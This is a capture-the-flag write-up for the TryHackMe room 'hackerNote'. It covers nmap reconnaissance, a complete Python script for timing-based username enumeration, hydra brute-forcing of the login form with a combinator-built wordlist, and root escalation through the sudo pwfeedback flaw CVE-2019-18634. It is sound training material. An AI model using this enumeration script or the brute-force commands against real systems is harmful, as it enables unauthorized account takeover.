WriteUp — THM hackerNote


Reconnaissance

Start with an Nmap scan of all TCP ports, with default scripts and version detection:

nmap -sC -sV -p- 10.10.31.138
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-17 13:56 EEST
Nmap scan report for 10.10.31.138
Host is up (0.053s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 10:a6:95:34:62:b0:56:2a:38:15:77:58:f4:f3:6c:ac (RSA)
| 256 6f:18:27:a4:e7:21:9d:4e:6d:55:b3:ac:c5:2d:d5:d3 (ECDSA)
|_ 256 2d:c3:1b:58:4d:c3:5d:8e:6a:f6:37:9d:ca:ad:20:7c (ED25519)
80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Home — hackerNote
8080/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Home — hackerNote
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Investigate

Create a throwaway account (a, 1, a) and then try logging in with combinations of valid and invalid usernames and passwords. A login with a valid username but the wrong password takes noticeably longer than one with a username that does not exist. This is a classic timing side channel: typically the server only computes the expensive password hash comparison when the username is found, so the response time alone reveals whether an account exists.

Exploit

Use that timing difference to enumerate usernames. I pick malenames-usa-top1000.txt from SecLists as the wordlist and time a login attempt with a wrong password for every name; names whose responses take clearly longer than the rest are existing accounts.
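The enumeration script itself is not on the page, so the following is an added example (my own code, not the author's) of the timing attack described above. It assumes the login endpoint and form field names that the hydra command later on this page uses (/api/user/login with username and password), takes several samples per name and uses the median so network jitter does not produce false positives, and treats the median of the whole list as the "invalid user" baseline because most names in a guessed wordlist do not exist. The URL, sample count and thresholds are assumptions.

```python
"""Timing-based username enumeration against a login form.

Added example, not the author's script. Assumes a POST endpoint taking
form-encoded username/password that answers slower for existing users.
"""
import statistics
import time
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Dict, Iterable, List, Optional

LOGIN_URL = "http://10.10.31.138/api/user/login"  # assumption: same endpoint hydra hits
SAMPLES = 5                      # attempts per name; the median smooths jitter
WRONG_PASSWORD = "not-the-password"


def time_login(username: str, password: str = WRONG_PASSWORD,
               url: str = LOGIN_URL) -> float:
    """Wall-clock seconds for one login POST. Only the duration matters;
    a 4xx 'Invalid' reply is still a perfectly good timing sample."""
    data = urllib.parse.urlencode(
        {"username": username, "password": password}).encode()
    req = urllib.request.Request(url, data=data, method="POST")
    start = time.perf_counter()
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            resp.read()
    except urllib.error.HTTPError as exc:
        exc.read()
    return time.perf_counter() - start


def measure(names: Iterable[str], probe: Callable[[str], float],
            samples: int = SAMPLES) -> Dict[str, float]:
    """Median response time per username; probe(name) returns seconds."""
    return {name: statistics.median(probe(name) for _ in range(samples))
            for name in names}


def find_valid_users(medians: Dict[str, float], factor: float = 3.0,
                     min_gap: float = 0.05,
                     baseline: Optional[float] = None) -> List[str]:
    """Names whose median time stands out from the baseline.

    baseline defaults to the median of all per-name medians, which is the
    fast (unknown-user) path as long as most guessed names are invalid.
    Pass baseline explicitly (timed with a name you know does not exist)
    when the wordlist might contain many real users. A name is flagged only
    if it is both `factor` times slower and at least `min_gap` seconds
    slower, so tiny absolute differences on a fast baseline are ignored.
    Result is ordered slowest first.
    """
    if baseline is None:
        baseline = statistics.median(medians.values())
    hits = [n for n, t in medians.items()
            if t > baseline * factor and t - baseline >= min_gap]
    return sorted(hits, key=lambda n: -medians[n])


if __name__ == "__main__":
    import sys
    wordlist = sys.argv[1] if len(sys.argv) > 1 else "malenames-usa-top1000.txt"
    with open(wordlist) as fh:
        names = [line.strip() for line in fh if line.strip()]
    medians = measure(names, time_login)
    for name in find_valid_users(medians):
        print(f"{name}\t{medians[name]:.3f}s")
```

Run it with the wordlist path as the first argument. The probe is a plain callable so the same analysis can be fed by any transport (a requests session, a proxy, a replayed capture); for the real target the absolute timings will vary, so tune factor and min_gap against a name you know is invalid and the account you created yourself.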

Attack Passwords

With james confirmed as a user, get his password hint from the web application. The hint points to a colour followed by a number, so build the candidate list by combining a colour wordlist with a number wordlist using combinator from hashcat-utils, then run it through hydra against the login endpoint; a failed login returns a response containing "Invalid", which hydra uses as the failure condition:

/usr/lib/hashcat-utils/combinator.bin colors.txt numbers.txt > attacklist.txt
hydra -l james -P attacklist.txt 10.10.31.138 http-post-form '/api/user/login:username=^USER^&password=^PASS^:Invalid'
Hydra v9.1 © 2020 by van Hauser/THC & David Maciejak — Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-10-17 15:05:46
[DATA] max 16 tasks per 1 server, overall 16 tasks, 180 login tries (l:1/p:180), ~12 tries per task
[DATA] attacking http-post-form://10.10.31.138:80/api/user/login:username=^USER^&password=^PASS^:Invalid
[STATUS] 48.00 tries/min, 48 tries in 00:01h, 132 to do in 00:03h, 16 active
[80][http-post-form] host: 10.10.31.138 login: james password: __REDACTED__
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-10-17 15:07:02

Escalate

The room's instructions point to CVE-2019-18634, a stack-based buffer overflow in sudo that is reachable by a local user when the pwfeedback option is enabled in /etc/sudoers (fixed in sudo 1.8.31). Before building anything, confirm the precondition: run sudo -l and type a few characters at the password prompt; if asterisks are echoed back, pwfeedback is on. Then fetch a public exploit for the CVE, compile it on the box and run it to get a root shell and the root flag.

Jari Laurila

CTO by day, learning cybersecurity by night.